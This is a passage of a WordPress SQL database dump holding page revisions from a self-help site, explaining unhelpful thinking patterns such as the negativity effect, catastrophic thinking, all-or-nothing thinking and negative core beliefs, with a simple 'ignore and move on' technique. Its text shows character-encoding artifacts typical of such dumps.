such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that oneâ€™s mind can use to change negative thinking. I like to think of such mental techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these tools to change oneâ€™s negative thinking. These â€œtoolsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1844,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron160623c.jpg" alt="" class="wp-image-1844"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-16 19:15:28', '2023-06-16 19:15:28', '', 1034, 'https://www.happythinking.com/?p=1853', 0, 'revision', '', 0),
(1948, 1, '2023-06-21 17:24:36', '2023-06-21 17:24:36', '<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the previous section, you learnt about the â€œreality checkâ€ tool. When using that tool, most of the time, one will find that when looking for evidence to support the negative thought, that thought just disappears, almost as if that thought realises on its own that it is no longer valid. However, sometimes one may find that even though one has shown that there is little evidence to support a negative thought, that thought may still â€œhang aroundâ€. If this were to happen, it is crucial that one does not â€œpushâ€ the negative thought away. As I explained to you when describing the pause tool, trying to stop or push away a thought can actually have the opposite effect, where the thought comes back even more. A much better option is to let the thought hang around as much as it likes, but crucially, since one knows that the thought is not valid, one can just ignore it. â€œIgnoringâ€ means that even though the thought is present, one does not react to it. One does not react to the thought because one knows, by using the reality check tool, that the negative thought does not represent reality. Ultimately a thought that one does not react to will disappear, just like if one does not react to a friend, that friend will soon get bored and will leave!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very effective way to help ignore a thought is to add another step, which I call â€œMove onâ€. Essentially, after one decides to ignore a thought, one moves oneâ€™s mindâ€™s attention onto something else. Let me explain using the example we used in the previous sections, where Jayâ€™s partner was a bit late returning home from work. You will note that one can often use multiple combinations of tools together. This is sort of like how a mechanic will often use more than one tool when repairing a machine.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So putting all this together, let''s see an example of the â€œIgnore/ Move onâ€ tool in use.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We start with Jayâ€™s partner not being home 10 minutes past the usual time she normally returns home from work. Jay has the negative thought, â€œShe must have had a terrible road traffic accidentâ€. Jay then uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself. He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. Since he still has the negative thought lingering in the background of his mind, he decides to use the ignore &amp; move on tool. Using his internal voice, he says to himself â€œIgnore and Move onâ€. He doesnâ€™t react to the negative thought and lets it be. He then moves on to a different thought, which on this occasion happens to be thinking of what he will be cooking for dinner. Eventually, Jayâ€™s negative thought fades away, avoiding him having unnecessary distress.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As I tell you about these tools, you may think they are complex. In reality, they are very easy to do in practice. The tools may appear to be â€œlengthyâ€, but that is only because I am breaking them down into individual steps. While it may take you a while to read and understand the tools, actually using the tools will take you much less time. And of course, like everything, with a bit of practice, it will only get quicker.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Ignore / Move on tool', '', 'inherit', 'closed', 'closed', '', '1658-revision-v1', '', '', '2023-06-21 17:24:36', '2023-06-21 17:24:36', '', 1658, 'https://www.happythinking.com/?p=1948', 0, 'revision', '', 0),
(1732, 1, '2023-06-06 08:19:27', '2023-06-06 08:19:27', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various unhelpful thinking patterns, by discussing one that psychologists call the â€œnegativity effectâ€. This is a common type of unhelpful thinking and is a very important one to understand as it may, in some, contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In oneâ€™s day to day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone). Unfortunately, oneâ€™s mind may develop an unhelpful thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus almost fully on the lost mobile phone, while ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking is unhelpful because it makes the situation worse than it needs to be, as when one minimises positive events, they donâ€™t help to reduce the emotional impact of negative events. A more â€œhelpfulâ€ way to think would have been to see both the negative and positive events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in a â€œnegativity effectâ€ type unhelpful thinking pattern. This tendency may have been inherited from our ancestors from many thousands of years ago, when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a lion''s tail. If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a lion''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst lions and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here is a short example of the negativity effect type of unhelpful thinking</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. This made him unnecessarily feel very sad about his situation.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when you do the negativity effect type of unhelpful thinking. As I mentioned before, Happy Thinking is about dealing with such unhelpful thinking. Once we have gone over the common types of unhelpful thinking, I will share with you some tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-06 08:19:27', '2023-06-06 08:19:27', '', 1616, 'https://www.happythinking.com/?p=1732', 0, 'revision', '', 0),
(1733, 1, '2023-06-06 08:20:45', '2023-06-06 08:20:45', '<!-- wp:paragraph -->\n<p>In our day to day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns in them. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-06-06 08:20:45', '2023-06-06 08:20:45', '', 1620, 'https://www.happythinking.com/?p=1733', 0, 'revision', '', 0),
(1734, 1, '2023-06-06 08:23:57', '2023-06-06 08:23:57', '<!-- wp:paragraph -->\n<p>In our day to day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns in them. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-06-06 08:23:57', '2023-06-06 08:23:57', '', 1620, 'https://www.happythinking.com/?p=1734', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1735, 1, '2023-06-06 08:25:14', '2023-06-06 08:25:14', '<!-- wp:paragraph -->\n<p>As mentioned previously, unhelpful thinking patterns often involve ways of thinking that distort how things really are. The unhelpful thinking pattern that we will discuss on this page is called â€œall or nothing thinkingâ€ which means that one makes extreme judgments on various things, rather than making more balanced â€œin-betweenâ€ judgments. Most things in the world around you are not â€œextremeâ€. There is a good chance that the coffee or tea that you drink at the train station every day doesnâ€™t taste â€œextremely goodâ€ or â€œextremely badâ€. Rather, it is more likely to taste somewhere in between the two extremes. Similarly, your colleagues at your workplace are probably not â€œextremely friendlyâ€ or â€œextremely unfriendlyâ€, but more likely to be somewhere in between.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, one may develop a thinking pattern that involves one thinking in extremes (e.g. that coffee is extremely good, my colleagues are extremely bad etc), rather than seeing things in a more realistic â€œin-between wayâ€. Psychologists have named this thinking, â€œall or nothingâ€ thinking, where the word â€œallâ€ represents one extreme, and the word&nbsp; â€œnothingâ€ represents the other extreme.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>All or nothing thinking can make you unhappy as it can make you judge situations wrongly. The following short examples will help you to understand how it can cause harm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Example 1</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that you have a good friend called Lucy. She has been a true friend to you for many years, sharing your happiness and troubles. Lucy has always gone out of her way to be helpful to you whenever you were in need.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us now imagine that today is your birthday and that Lucy, perhaps because she was busy, forgot to wish you. Now let us suppose that your brain does all or nothing thinking. Your brain will make you think, â€œLucy is a really terrible person who does not care about me at all. How could she forget my birthday, when she knows I like people to wish me? She is completely useless, etc.â€ In this scenario, â€œall or nothing thinkingâ€ is making you think only in extremes. You ignore all the good that Lucy has done over the years, and instead, let this one small error made by her, make her â€œall badâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In reality, while it was â€œbadâ€ for Sally to have forgotten your birthday, it was only one â€œbadâ€ thing among the many more â€œgoodâ€ things she has done for you over the years. So instead of seeing Lucy as â€œcompletely badâ€, a better way would be to see her as being â€œmostly goodâ€ and only â€œslightly badâ€. As you have seen in this example, all or nothing thinking can make one judge people unfairly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Example 2</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anju goes to a restaurant and has a three-course meal. The starters taste fantastic, the main course is equally delicious, and even the dessert is super good. Then at the end, Anju orders a coffee. The waiter brings the coffee and as a special treat, also brings a biscuit to go with it. Anju finds the coffee to be excellent, but unfortunately discovers that the biscuit is a little spoiled.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At this point, letâ€™s imagine that Anjuâ€™s brain does all or nothing thinking. This makes her focus only on the spoilt biscuit and completely forget that the other parts of the meal were fantastic. Anju complains about the biscuit for the rest of the evening, telling everyone how the meal was completely terrible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see how, because of all or nothing thinking, the restaurant was not judged fairly. This is not to say that the spoilt biscuit should have been ignored. Rather, it is about putting things in the correct perspective.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you have seen in the above examples, all or nothing thinking distorts how things really are, and this can make one make wrong judgments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'All or nothing thinking', '', 'inherit', 'closed', 'closed', '', '1627-revision-v1', '', '', '2023-06-06 08:25:14', '2023-06-06 08:25:14', '', 1627, 'https://www.happythinking.com/?p=1735', 0, 'revision', '', 0),
(1736, 1, '2023-06-06 08:26:30', '2023-06-06 08:26:30', '<!-- wp:paragraph -->\n<p>First of all, let me make it clear that when I talk about â€œbeliefsâ€, I certainly do not mean religious beliefs! Rather, it is about the beliefs one has about oneself, other people, and the world. For example, regarding oneself, one might have the belief, â€œI am caringâ€. Regarding others, one might have the belief, â€œPeople are selfishâ€ and regarding the world, one might have the belief, â€œThere are a lot of dangers out there.â€ Such beliefs are central to a person''s view of everything within and outside, and for this reason, are called â€œcore beliefsâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When one is born, oneâ€™s mind essentially has no beliefs about anything. However, from that blank state onwards, one starts to form beliefs about various things. For example, even as a baby, one would learn which faces belong to those that will cuddle and give nourishment and which faces belong to those who provide no benefit. I.e. one forms certain beliefs about who is â€œgoodâ€ for oneâ€™s survival and who is â€œbadâ€. As oneâ€™s childhood years progress, one''s brain continually updates oneâ€™s core beliefs.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs are the driving force of a person, and one''s mind tries its best to think in ways that support such core beliefs. I call thoughts that support oneâ€™s core beliefs, â€œsupporting thoughtsâ€. For example, imagine that a person has the core belief, â€œI can learn new thingsâ€. For this core belief, one of the supportive thoughts might be, â€œIf I have an opportunity to learn new things, I should take up that opportunityâ€. Letâ€™s take another example, where a person, who we will call Sujith, has the core belief, â€œI have good leadership skillsâ€. Now suppose Sujith, at a social event, meets an owner of a major company and that person offers Sujith a very attractive job as a manager. In this situation, Sujithâ€™s mind may develop the supporting thought, â€œI have the skills that will help me to do well in this new job, therefore I should accept itâ€, prompting him to take up that offer. However, let us now imagine that Sujith''s mind has the opposite core belief, â€œI have poor leadership skillsâ€. In this scenario, if he was offered the same job, his mind might have the supporting thought, â€œYou have useless leadership skills and you will therefore fail in this new jobâ€, prompting him to refuse the job offer. The supporting thoughts blindly support one''s core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As core beliefs direct almost all aspects of oneâ€™s life, itâ€™s very important that one has core beliefs that truly represent oneself. You may now wonder how one can have core beliefs that do not truly represent oneself. Unfortunately, this can happen quite easily and I will explain how. As mentioned before, core beliefs start to form in oneâ€™s childhood, which is a time when oneâ€™s mind is not fully developed and is quite immature. This can lead to one having core beliefs that may not be truly logical. For example, imagine that a small child is with her mother, who is quite preoccupied with some pressing issue. As they walk in the park, imagine that the mother buys ice cream for her child. Unfortunately, a few minutes later, imagine that the child accidentally drops the ice cream, and the mother, in a lapse of concentration, says, â€œYou are stupidâ€. While an adult in this situation would not consider herself to be seriously stupid just because one drops an ice cream, for a child, who does not have the mental maturity of an adult, this event, coming from her mother who she values, may be taken seriously, and lead to the formation of the negative core belief, â€œI am stupidâ€. Now you might say, â€œSurely, when this child grows up, she would replace this with a more realistic core belief, such as â€œI am not stupid.â€ Unfortunately, things are not all that logical when it comes to the mind! What can happen is that some childhood core beliefs can remain unchanged in the mind and persist into adulthood. This can happen because oneâ€™s mind may have not â€œbotheredâ€ to challenge those beliefs with new, more logical adult thinking. Such unchallenged negative core beliefs that persist into adulthood can cause harm. In the example of the child with the negative core belief, â€œI am stupidâ€, if this is not challenged with new thinking (i.e. adult logic), the adult may well continue with the same negative core belief, and that may well limit the potential of this adult. For example, this unchallenged negative core belief may well dissuade the adult from pursuing a university education. This would be a pity, because this negative core belief may well be untrue, and the person may well have flourished in university.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged negative core beliefs may remain quietly in the background, and get activated at only certain times. For example, continuing with the ice cream example, the adult person may not be always thinking â€œI am stupid.â€ But say, when this person thinks about applying for a university education, the â€œI am stupidâ€ negative core belief may surface at that moment, and dissuade the person from continuing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs can sometimes be difficult to discover as they may lie in the background. However, you will recall that the mind also has â€œsupporting thoughtsâ€, that support core beliefs. If you cannot work out your core beliefs, you may be able to recognise the supporting thoughts instead. For example, when thinking about higher education, you may not recognise the negative core belief â€œI am stupidâ€, but instead, recognise the supporting thought, â€œI should not apply to university, as I will surely fail if I enrolled in one.â€ Such supporting thoughts that support untrue negative core beliefs are â€œunhelpfulâ€ in your life. Analysing oneâ€™s unhelpful thinking patterns can suggest the hidden negative core beliefs in a person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can imagine, unchallenged core beliefs can unnecessarily limit a person''s potential. One goal of happy thinking is of course to deal with such beliefs. However, we will keep that for later on the website, when we discuss various psychological tools that you can use to access and change core beliefs. For now, just remember the basic concept of core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button 